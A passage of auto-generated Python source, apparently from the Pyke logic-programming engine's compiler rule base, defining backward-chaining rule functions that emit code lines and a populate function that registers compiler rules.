mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
context.lookup_data('clause_num') + 1):
context.end_save_all_undo()
with engine.prove(rule.rule_base.root_name, 'python_premise', context,
(rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),)) \
as gen_2:
for x_2 in gen_2:
assert x_2 is None, \
"compiler.bc_python_premise: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def python_eq(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
\
helpers.merge_pattern(context.lookup_data('pattern'), context.lookup_data('patterns_in'))):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
context.lookup_data('python_code')[:-1] + (context.lookup_data('python_code')[-1] + '):',)):
context.end_save_all_undo()
mark3 = context.mark(True)
if rule.pattern(2).match_data(context, context,
("mark%d = context.mark(True)" % context.lookup_data('clause_num'),
"if rule.pattern(%d).match_data(context, context," %
context.lookup_data('pat_num'),
('INDENT', 2),
('INDENT', 5),
('STARTING_LINENO', context.lookup_data('start_lineno')),
context.lookup_data('python_code2'),
('ENDING_LINENO', context.lookup_data('end_lineno')),
"POPINDENT",
"context.end_save_all_undo()",
)):
context.end_save_all_undo()
mark4 = context.mark(True)
if rule.pattern(3).match_data(context, context,
('POPINDENT',
"else: context.end_save_all_undo()",
"context.undo_to_mark(mark%d)" % context.lookup_data('clause_num'),)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def python_in(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
\
helpers.merge_pattern(context.lookup_data('pattern'), context.lookup_data('patterns_in'))):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
context.lookup_data('python_code')[:-1] + (context.lookup_data('python_code')[-1] + ':',)):
context.end_save_all_undo()
mark3 = context.mark(True)
if rule.pattern(2).match_data(context, context,
("for python_ans in \\",
('INDENT', 2),
('INDENT', 2),
('STARTING_LINENO', context.lookup_data('start_lineno')),
context.lookup_data('python_code2'),
('ENDING_LINENO', context.lookup_data('end_lineno')),
'POPINDENT',
"mark%d = context.mark(True)" % context.lookup_data('clause_num'),
"if rule.pattern(%d).match_data(context, context, "
"python_ans):" % context.lookup_data('pat_num'),
('INDENT', 2),
"context.end_save_all_undo()",
)):
context.end_save_all_undo()
mark4 = context.mark(True)
if rule.pattern(3).match_data(context, context,
( () if context.lookup_data('break_cond') is None
else ("if %s:" % context.lookup_data('break_cond'),
('INDENT', 2),
"context.undo_to_mark(mark%d)" % context.lookup_data('clause_num'),
"break",
'POPINDENT',),
'POPINDENT',
"else: context.end_save_all_undo()",
"context.undo_to_mark(mark%d)" % context.lookup_data('clause_num'),
'POPINDENT',)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def python_check(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
context.lookup_data('python_code')[:-1] + (context.lookup_data('python_code')[-1] + ':',)):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
(('STARTING_LINENO', context.lookup_data('start_lineno')),
"if " + context.lookup_data('python_code2')[0].strip(),
('INDENT', 3),
context.lookup_data('python_code2')[1:],
'POPINDENT',
('ENDING_LINENO', context.lookup_data('end_lineno')),
('INDENT', 2),
)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def python_block(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def populate(engine):
This_rule_base = engine.get_create('compiler')
bc_rule.bc_rule('file', This_rule_base, 'compile',
file, None,
(contexts.variable('generated_root_pkg'),
contexts.variable('rb_name'),
pattern.pattern_tuple((pattern.pattern_literal('file'), contexts.variable('parent'), pattern.pattern_tuple((contexts.variable('fc_rules'), contexts.variable('fc_extra_lines'),), None), pattern.pattern_tuple((contexts.variable('bc_rules'), contexts.variable('bc_extra_lines'), contexts.variable('plan_extra_lines'),), None),), None),
contexts.variable('fc_lines'),
contexts.variable('bc_lines'),
contexts.variable('plan_lines'),),
(),
(contexts.variable('fc_head'),
contexts.variable('bc_head'),
contexts.variable('plan_head'),
contexts.variable('rb_name'),
contexts.variable('parent'),
contexts.variable('decl_line'),
contexts.variable('fc_rules'),
contexts.variable('fc_fun_lines'),
contexts.variable('fc_init_lines'),
contexts.variable('bc_rules'),
contexts.variable('bc_plan_lines'),
contexts.variable('bc_bc_fun_lines'),
contexts.variable('bc_bc_init_lines'),
contexts.variable('fc_lines'),
contexts.variable('plan_lines'),
contexts.variable('bc_lines'),))
bc_rule.bc_rule('rule_decl', This_rule_base, 'rule_decl',
rule_decl, None,
(contexts.variable('rb_name'),
pattern.pattern_literal(None),
contexts.variable('decl_line'),),
(),
(contexts.variable('decl_line'),))
bc_rule.bc_rule('rule_decl_with_parent', This_rule_base, 'rule_decl',
rule_decl_with_parent, None,
(contexts.variable('rb_name'),
pattern.pattern_tuple((pattern.pattern_literal('parent'), contexts.variable('parent'), contexts.variable('excluded_symbols'),), None),
contexts.variable('decl_line'),),
(),
(contexts.variable('decl_line'),))
bc_rule.bc_rule('fc_rules', This_rule_base, 'fc_rules',
fc_rules, None,
(contexts.variable('fc_rules'),
contexts.variable('fc_funs'),
contexts.variable('fc_init'),),
(),
(contexts.variable('fc_rule'),
contexts.variable('fc_fun_1'),
contexts.variable('fc_init_1'),
contexts.variable('fc_funs'),
contexts.variable('fc_init'),))
bc_rule.bc_rule('fc_rule_', This_rule_base, 'fc_rule',
fc_rule_, None,
(pattern.pattern_tuple((pattern.pattern_literal('fc_rule'), contexts.variable('rule_name'), contexts.variable('fc_premises'), contexts.variable('assertions'),), None),
contexts.variable('fc_fun'),
contexts.variable('fc_init'),),
(),
(contexts.variable('rule_name'),
pattern.pattern_literal(0),
contexts.anonymous('_'),
contexts.variable('fc_premises'),
pattern.pattern_literal(None),
pattern.pattern_literal(False),
contexts.variable('prem_fn_head'),
contexts.variable('prem_fn_tail'),
contexts.variable('prem_decl_lines'),
pattern.pattern_literal(()),
contexts.variable('patterns_out1'),
contexts.variable('assertions'),
contexts.variable('asserts_fn_lines'),
contexts.variable('patterns_out'),
contexts.variable('fc_fun'),
contexts.variable('fc_init'),))
bc_rule.bc_rule('fc_premises0', This_rule_base, 'fc_premises',
fc_premises0, None,
(contexts.anonymous('_'),
contexts.variable('clause_num'),
contexts.variable('clause_num'),
pattern.pattern_literal(()),
contexts.anonymous('_'),
contexts.anonymous('_'),
pattern.pattern_literal(()),
pattern.pattern_literal(()),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_in'),
pattern.pattern_literal(()),
contexts.variable('patterns_in'),
contexts.variable('patterns_in'),),
(),
())
bc_rule.bc_rule('fc_premises1', This_rule_base, 'fc_premises',
fc_premises1, None,
(contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((contexts.variable('first_prem'),), contexts.variable('rest_prems')),
contexts.variable('break_cond'),
contexts.variable('multi_match'),
pattern.pattern_tuple((contexts.variable('fn_head1'),), contexts.variable('fn_head2')),
pattern.pattern_tuple((contexts.variable('fn_tail2'),), contexts.variable('fn_tail1')),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),),
(),
(contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num1'),
contexts.variable('first_prem'),
contexts.variable('break_cond'),
contexts.variable('multi_match'),
contexts.variable('fn_head1'),
contexts.variable('fn_tail1'),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out1'),
contexts.variable('decl_lines1'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out1'),
contexts.variable('next_clause_num'),
contexts.variable('rest_prems'),
contexts.variable('fn_head2'),
contexts.variable('fn_tail2'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines2'),
contexts.variable('patterns_out'),
contexts.variable('decl_lines'),))
bc_rule.bc_rule('fc_premise', This_rule_base, 'fc_premise',
fc_premise, None,
(contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('fc_premise'), contexts.variable('kb_name'), contexts.variable('entity_name'), contexts.variable('arg_patterns'), contexts.variable('start_lineno'), contexts.variable('end_lineno'),), None),
contexts.variable('break_cond'),
contexts.variable('multi_match'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_in'),),
(),
(contexts.variable('kb_name'),
contexts.variable('entity_name'),
contexts.variable('start_lineno'),
contexts.variable('end_lineno'),
contexts.variable('multi_match'),
contexts.variable('decl_num_in'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
contexts.variable('next_clause_num'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),))
bc_rule.bc_rule('gen_fc_for_false', This_rule_base, 'gen_fc_for',
gen_fc_for_false, None,
(contexts.variable('kb_name'),
contexts.variable('entity_name'),
contexts.variable('start_lineno'),
contexts.variable('end_lineno'),
pattern.pattern_literal(False),
contexts.variable('decl_num'),
contexts.variable('fn_head'),),
(),
(contexts.variable('fn_head'),))
bc_rule.bc_rule('gen_fc_for_true', This_rule_base, 'gen_fc_for',
gen_fc_for_true, None,
(contexts.variable('kb_name'),
contexts.variable('entity_name'),
contexts.variable('start_lineno'),
contexts.variable('end_lineno'),
pattern.pattern_literal(True),
contexts.variable('decl_num'),
contexts.variable('fn_head'),),
(),
(contexts.variable('fn_head'),))
bc_rule.bc_rule('fc_first', This_rule_base, 'fc_premise',
fc_first, None,
(contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('fc_first'), contexts.variable('premises1'), contexts.anonymous('_'),), None),
contexts.anonymous('_'),
contexts.anonymous('_'),
pattern.pattern_tuple((contexts.variable('init_worked'), contexts.variable('fn_head'), contexts.variable('set_worked'),), None),
contexts.variable('fn_tail'),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),),
(),
(contexts.variable('break_cond'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
contexts.variable('premises1'),
pattern.pattern_literal(True),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('init_worked'),
contexts.variable('set_worked'),))
bc_rule.bc_rule('fc_forall_None', This_rule_base, 'fc_premise',
fc_forall_None, None,
(contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('fc_forall'), contexts.variable('premises1'), pattern.pattern_literal(None), contexts.anonymous('_'), contexts.anonymous('_'),), None),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.variable('fn_head'),
pattern.pattern_literal(()),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),),
(),
(contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
contexts.variable('premises1'),
pattern.pattern_literal(None),
pattern.pattern_literal(True),
contexts.variable('fn_head1'),
contexts.variable('fn_tail1'),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('fn_head'),))
bc_rule.bc_rule('fc_forall_require', This_rule_base, 'fc_premise',
fc_forall_require, None,
(contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('fc_forall'), contexts.variable('premises1'), contexts.variable('require'), contexts.variable('start_lineno'), contexts.anonymous('_'),), None),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.variable('fn_head'),
pattern.pattern_literal(("POPINDENT",)),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),),
(),
(contexts.variable('break_true'),
contexts.variable('break_false'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num1'),
contexts.variable('premises1'),
pattern.pattern_literal(True),
contexts.variable('fn_head1'),
contexts.variable('fn_tail1'),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out1'),
contexts.variable('decl_lines1'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out1'),
contexts.variable('next_clause_num'),
contexts.variable('require'),
contexts.variable('fn_head2'),
contexts.variable('fn_tail2'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines2'),
contexts.variable('patterns_out'),
contexts.variable('fn_head'),
contexts.variable('decl_lines'),))
bc_rule.bc_rule('fc_notany', This_rule_base, 'fc_premise',
fc_notany, None,
(contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('fc_notany'), contexts.variable('premises'), contexts.variable('start_lineno'),), None),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.variable('fn_head'),
pattern.pattern_literal(("POPINDENT",)),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),),
(),
(contexts.variable('break_true'),
contexts.variable('break_false'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
contexts.variable('premises'),
pattern.pattern_literal(True),
contexts.variable('fn_head1'),
contexts.variable('fn_tail1'),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_out'),
contexts.variable('decl_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('fn_head'),))
bc_rule.bc_rule('fc_python_premise', This_rule_base, 'fc_premise',
fc_python_premise, None,
(contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
contexts.variable('python_premise'),
contexts.variable('break_cond'),
contexts.anonymous('_'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
contexts.variable('decl_num_in'),
contexts.variable('decl_num_in'),
pattern.pattern_literal(()),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),),
(),
(contexts.variable('next_clause_num'),
contexts.variable('clause_num'),
contexts.variable('python_premise'),
contexts.variable('break_cond'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('assertions_0', This_rule_base, 'assertions',
assertions_0, None,
(pattern.pattern_literal(()),
pattern.pattern_literal(()),
contexts.variable('patterns_in'),
contexts.variable('patterns_in'),),
(),
())
bc_rule.bc_rule('assertions_n', This_rule_base, 'assertions',
assertions_n, None,
(pattern.pattern_tuple((contexts.variable('first_assertion'),), contexts.variable('rest_assertions')),
pattern.pattern_tuple((contexts.variable('fn_lines1'),), contexts.variable('fn_lines2')),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),),
(),
(contexts.variable('first_assertion'),
contexts.variable('fn_lines1'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out1'),
contexts.variable('rest_assertions'),
contexts.variable('fn_lines2'),
contexts.variable('patterns_out'),))
bc_rule.bc_rule('assertion', This_rule_base, 'assertion',
assertion, None,
(pattern.pattern_tuple((pattern.pattern_literal('assert'), contexts.variable('kb_name'), contexts.variable('entity_name'), contexts.variable('patterns'), contexts.variable('start_lineno'), contexts.variable('end_lineno'),), None),
contexts.variable('fn_lines'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),),
(),
(pattern.pattern_tuple((contexts.variable('pat_nums'), contexts.variable('patterns_out'),), None),
contexts.variable('fn_lines'),))
bc_rule.bc_rule('python_assertion', This_rule_base, 'assertion',
python_assertion, None,
(pattern.pattern_tuple((pattern.pattern_literal('python_assertion'), pattern.pattern_tuple((contexts.variable('python_code'), contexts.anonymous('_'), contexts.anonymous('_'), contexts.anonymous('_'),), None), contexts.variable('start_lineno'), contexts.variable('end_lineno'),), None),
pattern.pattern_tuple((pattern.pattern_tuple((pattern.pattern_literal('STARTING_LINENO'), contexts.variable('start_lineno'),), None), contexts.variable('python_code'), pattern.pattern_tuple((pattern.pattern_literal('ENDING_LINENO'), contexts.variable('end_lineno'),), None),), None),
contexts.variable('patterns_in'),
contexts.variable('patterns_in'),),
(),
())
bc_rule.bc_rule('bc_rules', This_rule_base, 'bc_rules',
bc_rules, None,
(contexts.variable('rb_name'),
contexts.variable('bc_rules'),
contexts.variable('bc_plan_lines'),
contexts.variable('bc_bc_funs'),
contexts.variable('bc_bc_init'),),
(),
(contexts.variable('bc_rule'),
contexts.variable('rb_name'),
contexts.variable('bc_plan1'),
contexts.variable('bc_bc_fun1'),
contexts.variable('bc_bc_init1'),
contexts.variable('bc_plan_lines'),
contexts.variable('bc_bc_funs'),
contexts.variable('bc_bc_init'),))
bc_rule.bc_rule('bc_rule_', This_rule_base, 'bc_rule',
bc_rule_, None,
(contexts.variable('rb_name'),
pattern.pattern_tuple((pattern.pattern_literal('bc_rule'), contexts.variable('name'), contexts.variable('goal'), contexts.variable('bc_premises'), contexts.variable('python_lines'), contexts.variable('plan_vars_needed'),), None),
contexts.variable('plan_lines'),
contexts.variable('bc_fun_lines'),
contexts.variable('bc_init_lines'),),
(),
(contexts.variable('rb_name'),
contexts.variable('name'),
contexts.variable('bc_premises'),
contexts.variable('plan_vars_needed'),
contexts.variable('prem_plan_lines'),
contexts.variable('prem_fn_head'),
contexts.variable('prem_fn_tail'),
contexts.variable('prem_decl_lines'),
pattern.pattern_tuple((contexts.variable('plan_lines'), contexts.variable('goal_fn_head'), contexts.variable('goal_fn_tail'), contexts.variable('goal_decl_lines'),), None),
contexts.variable('bc_fun_lines'),
contexts.variable('bc_init_lines'),))
bc_rule.bc_rule('bc_premises', This_rule_base, 'bc_premises',
bc_premises, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('bc_premises'),
contexts.variable('plan_vars_needed'),
contexts.variable('plan_lines'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
contexts.variable('decl_lines'),),
(),
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
pattern.pattern_literal(1),
contexts.anonymous('_'),
contexts.variable('bc_premises'),
pattern.pattern_literal(None),
pattern.pattern_literal(True),
pattern.pattern_literal(()),
contexts.variable('patterns'),
contexts.variable('plan_vars_needed'),
contexts.variable('plan_var_names'),
contexts.variable('plan_lines1'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
contexts.variable('pat_lines'),
contexts.variable('decl_lines'),
contexts.variable('plan_lines'),))
bc_rule.bc_rule('bc_premises1_0', This_rule_base, 'bc_premises1',
bc_premises1_0, None,
(contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.variable('clause_num'),
contexts.variable('clause_num'),
pattern.pattern_literal(()),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.variable('patterns'),
contexts.variable('patterns'),
contexts.variable('plan_var_names'),
contexts.variable('plan_var_names'),
pattern.pattern_literal(()),
pattern.pattern_literal(()),
pattern.pattern_literal(()),),
(),
())
bc_rule.bc_rule('bc_premises1_n', This_rule_base, 'bc_premises1',
bc_premises1_n, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((contexts.variable('first_prem'),), contexts.variable('rest_prems')),
contexts.variable('break_cond'),
contexts.variable('allow_plan'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names_in'),
contexts.variable('plan_var_names_out'),
contexts.variable('plan_lines'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),),
(),
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num1'),
contexts.variable('first_prem'),
contexts.variable('break_cond'),
contexts.variable('allow_plan'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out1'),
contexts.variable('plan_var_names_in'),
contexts.variable('plan_var_names_out1'),
contexts.variable('plan_lines1'),
contexts.variable('fn_head1'),
contexts.variable('fn_tail1'),
contexts.variable('next_clause_num'),
contexts.variable('rest_prems'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names_out'),
contexts.variable('plan_lines2'),
contexts.variable('fn_head2'),
contexts.variable('fn_tail2'),
contexts.variable('plan_lines'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('bc_premise', This_rule_base, 'bc_premise',
bc_premise, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('bc_premise'), contexts.variable('required'), contexts.variable('kb_name'), contexts.variable('entity_name'), contexts.variable('arg_patterns'), contexts.variable('plan_spec'), contexts.variable('start_lineno'), contexts.variable('end_lineno'),), None),
contexts.variable('break_cond'),
contexts.variable('allow_plan'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names_in'),
contexts.variable('plan_var_names_out'),
contexts.variable('plan_lines'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),),
(),
(contexts.variable('next_clause_num'),
contexts.variable('kb_name2'),
pattern.pattern_tuple((contexts.variable('pat_nums'), contexts.variable('patterns_out1'),), None),
contexts.variable('fn_head1'),
contexts.variable('required'),
contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
pattern.pattern_literal(('POPINDENT', 'POPINDENT',)),
contexts.variable('fn_head2'),
contexts.variable('fn_tail2'),
contexts.variable('plan_spec'),
contexts.variable('allow_plan'),
contexts.variable('patterns_out1'),
contexts.variable('patterns_out'),
contexts.variable('fn_head3'),
contexts.variable('fn_tail3'),
contexts.variable('plan_lines'),
contexts.variable('plan_vars_needed'),
pattern.pattern_tuple((contexts.anonymous('_'), contexts.variable('plan_var_names_out'),), None),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('bc_first', This_rule_base, 'bc_premise',
bc_first, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('bc_first'), contexts.variable('required'), contexts.variable('bc_premises'), contexts.anonymous('_'),), None),
contexts.anonymous('_'),
contexts.variable('allow_plan'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names_in'),
contexts.variable('plan_var_names_out'),
contexts.variable('plan_lines'),
pattern.pattern_tuple((contexts.variable('init_worked'), contexts.variable('fn_head'), contexts.variable('set_worked'),), None),
contexts.variable('fn_tail'),),
(),
(contexts.variable('break_cond'),
contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
contexts.variable('bc_premises'),
contexts.variable('allow_plan'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names_in'),
contexts.variable('plan_var_names_out'),
contexts.variable('plan_lines'),
contexts.variable('fn_head1'),
contexts.variable('fn_tail1'),
contexts.variable('required'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
contexts.variable('init_worked'),
contexts.variable('set_worked'),))
bc_rule.bc_rule('bc_forall_None', This_rule_base, 'bc_premise',
bc_forall_None, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('bc_forall'), contexts.variable('bc_premises'), pattern.pattern_literal(None), contexts.anonymous('_'), contexts.anonymous('_'),), None),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names_in'),
contexts.variable('plan_var_names_out'),
contexts.variable('plan_lines'),
contexts.variable('fn_head'),
pattern.pattern_literal(()),),
(),
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
contexts.variable('bc_premises'),
pattern.pattern_literal(None),
pattern.pattern_literal(False),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names_in'),
contexts.variable('plan_var_names_out'),
contexts.variable('plan_lines'),
contexts.variable('fn_head1'),
contexts.variable('fn_tail'),
contexts.variable('fn_head'),))
bc_rule.bc_rule('bc_forall_require', This_rule_base, 'bc_premise',
bc_forall_require, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('bc_forall'), contexts.variable('premises1'), contexts.variable('require'), contexts.variable('start_lineno'), contexts.anonymous('_'),), None),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names_in'),
contexts.variable('plan_var_names_out'),
pattern.pattern_literal(()),
contexts.variable('fn_head'),
pattern.pattern_literal(("POPINDENT",)),),
(),
(contexts.variable('break_true'),
contexts.variable('break_false'),
contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num1'),
contexts.variable('premises1'),
pattern.pattern_literal(False),
contexts.variable('patterns_in'),
contexts.variable('patterns_out1'),
contexts.variable('plan_var_names_in'),
contexts.variable('plan_var_names_out1'),
pattern.pattern_literal(()),
contexts.variable('fn_head1'),
contexts.variable('fn_tail1'),
contexts.variable('next_clause_num'),
contexts.variable('require'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names_out'),
contexts.variable('fn_head2'),
contexts.variable('fn_tail2'),
contexts.variable('fn_head'),))
bc_rule.bc_rule('bc_notany', This_rule_base, 'bc_premise',
bc_notany, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('bc_notany'), contexts.variable('bc_premises'), contexts.variable('start_lineno'),), None),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_in'),
contexts.variable('plan_var_out'),
pattern.pattern_literal(()),
contexts.variable('fn_head'),
pattern.pattern_literal(("POPINDENT",)),),
(),
(contexts.variable('break_true'),
contexts.variable('break_false'),
contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
contexts.variable('bc_premises'),
pattern.pattern_literal(False),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_in'),
contexts.variable('plan_var_out'),
pattern.pattern_literal(()),
contexts.variable('fn_head1'),
contexts.variable('fn_tail1'),
contexts.variable('fn_head'),))
bc_rule.bc_rule('no_plan', This_rule_base, 'gen_plan_lines',
no_plan, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
pattern.pattern_literal(None),
contexts.anonymous('_'),
contexts.variable('patterns_in'),
contexts.variable('patterns_in'),
contexts.variable('fn_head'),
pattern.pattern_literal(()),
pattern.pattern_literal(()),
